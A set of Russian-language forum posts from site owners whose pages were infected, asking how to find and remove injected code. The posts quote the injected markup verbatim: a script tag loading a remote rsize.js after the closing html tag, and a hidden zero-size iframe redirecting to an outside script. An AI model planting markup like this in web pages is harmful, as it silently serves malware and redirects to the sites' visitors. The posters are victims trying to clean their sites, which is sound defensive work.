На сайте есть вредоносный код, но не знаю, в каком файле удалять…

Служба поддержки Касперского (по моему запросу, т.к. сам найти не смог) прислала сообщение, что у меня вредоносный код:

Следующий код является вредоносным:

</хтмл><скрипт src=«newdomme.changeip.name/rsize.js»></скрипт >

Если загрузить сайт newsstreet.ru в мозилле и нажать ctrl+U, то он виден в самом низу страницы. Но я не знаю, где на сервере ковырять, какой файл и в какой папке, чтобы его удалить.

Вообще код стоит сразу после тега </боди>, а именно после него идёт

</хтмл><скрипт src=«newdomme.changeip.name/rsize.js»></скрипт > — это конец страницы.

Подскажите, пожалуйста, где ковырять…

Заранее благодарю!

Доброй ночи.
Мой сайтик заполонили вирусы, браузеры его блочат.
Сейчас сменил index.php

Собственно как быть?
Имеет ли смысл скопировать его на винт и прогнать на вирусы?

сабж
redsblog.ru

яндекс пишет
вот это

поможите советом
сам не сталкивался ещё



в письме от яндекса:
На страницах вашего сайта redsblog.ru обнаружен код, который может быть опасен для посетителей. Выполнение этого кода при посещении сайта может привести к нежелательным для пользователя последствиям: заражению компьютера вредоносными программами, несанкционированному использованию его ресурсов, порче или краже личных данных.
В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

upd: Trojan-Clicker.HTML.Agent.bu // fixed

Друзья наш сайт постоянно заражают вирусами- помогите если кто то может.
Версия движка последняя, все ранее данные советы сделали.
То ли это уязвимость в движке, то ли это настройки сервера.
Читать дальше →

Никто не встречался с таким вот кодом

<iframe pvklf='0U2G5rHo' src='http://redirect-script.com/s/in.cgi?7 ' xexpk='NvXEwVRS' width='0' height='0' style='display:none'></iframe>

??? А то походу изза него у меня сайт упал… может ктото знает как помочь и что это вообще такое… фрейм какойто, откуда он взялся?

Кто нибудь знает реально действенный метод борьбы с iframe. Ну задолбали уже честное слово. В последнее время поменял пароли на фтп, поставил права на все файлы index, config, main, на сайте в 444, на компе стоит лицензионный KIS 2010, работаю с сайтом преимущественно из под ubuntu. Но вот недавно буквально на 5 минут изменил права index."*" и config."*" на 644 чтобы поставить модуль статистики avadim'a и сразу же за эти 5 минут напихали во все индексные файлы iframe. Они постоянно что ли проверяют можно ли мне нагадить или как? Пароли ни в браузерах ни в фтп клиентах не сохраняю. Как противостоять этим пидорам люди? Помогите побороть пожалуйста. Хостинг hc.ru. Спасибо.